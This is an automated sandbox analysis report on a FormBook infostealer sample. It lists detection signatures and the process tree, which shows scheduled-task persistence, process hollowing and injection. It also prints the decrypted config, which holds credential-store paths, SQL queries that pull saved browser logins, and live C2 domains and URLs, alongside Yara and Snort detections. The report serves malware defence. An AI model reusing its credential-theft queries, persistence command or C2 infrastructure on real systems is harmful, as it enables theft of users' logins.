Loading ...

Play interactive tourEdit tour

Analysis Report J0OmHIagw8.exe

Overview

General Information

Sample Name:J0OmHIagw8.exe
Analysis ID:339323
MD5:92ff500a693078263908c83b4b290481
SHA1:fa5dcc6012c71490efdf320791a90c7a18958a95
SHA256:767b1b32d4ac4cec73967590ca5b28c3e0f4d709c0773e3f4021774f15a2483a
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Tries to download HTTP data from a sinkholed server
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • J0OmHIagw8.exe (PID: 5816 cmdline: 'C:\Users\user\Desktop\J0OmHIagw8.exe' MD5: 92FF500A693078263908C83B4B290481)
    • schtasks.exe (PID: 5856 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vbc.exe (PID: 4116 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)
    • vbc.exe (PID: 5800 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 3448 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 5864 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "slgacha.com", "oohdough.com", "6983ylc.com", "aykassociate.com", "latin-hotspot.com", "starrockindia.com", "beamsubway.com", "queensboutique1000.com", "madbaddie.com", "bhoomimart.com", "ankitparivar.com", "aldanasanchezmx.com", "citest1597669833.com", "cristianofreitas.com", "myplantus.com", "counterfeitmilk.com", "8xf39.com", "pregnantwomens.com", "yyyut6.com", "stnanguo.com", "fessusesefsee.com", "logansshop.net", "familydalmatianhomes.com", "accessible.legal", "epicmassiveconcepts.com", "indianfactopedia.com", "exit-divorce.com", "colliapse.com", "nosishop.com", "hayat-aljowaily.com", "soundon.events", "previnacovid19-br.com", "traptlongview.com", "splendidhotelspa.com", "masterzushop.com", "ednevents.com", "studentdividers.com", "treningi-enduro.com", "hostingcoaster.com", "gourmetgroceriesfast.com", "thesouthbeachlife.com", "teemergin.com", "fixmygearfast.com", "arb-invest.com", "shemaledreamz.com", "1819apparel.com", "thedigitalsatyam.com", "alparmuhendislik.com", "distinctmusicproductions.com", "procreditexpert.com", "insights4innovation.com", "jzbtl.com", "1033325.com", "sorteocamper.info", "scheherazadelegault.com", "glowportraiture.com", "cleitstaapps.com", "globepublishers.com", "stattests.com", "brainandbodystrengthcoach.com", "magenx2.info", "escaparati.com", "wood-decor24.com", "travelnetafrica.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.herbmedia.net/csv8/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\J0OmHIagw8.exe' , ParentImage: C:\Users\user\Desktop\J0OmHIagw8.exe, ParentProcessId: 5816, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', ProcessId: 5856

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.fessusesefsee.com/csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhTAvira URL Cloud: Label: phishing
          Source: http://www.logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhTAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 5.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
          Multi AV Scanner detection for submitted fileShow sources
          Source: J0OmHIagw8.exeVirustotal: Detection: 31%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: J0OmHIagw8.exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: J0OmHIagw8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: J0OmHIagw8.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, control.exe, 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
          Source: Binary string: vbc.pdb source: control.exe, 00000008.00000002.576699588.00000000055C7000.00000004.00000001.sdmp
          Source: Binary string: control.pdbUGP source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 45.77.226.209:80 -> 192.168.2.3:49755
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 45.77.226.209:80 -> 192.168.2.3:49771
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
          Tries to download HTTP data from a sinkholed serverShow sources
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:16:25 GMTServer: X-SinkHole: Malware DNS SinkHole ServerContent-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
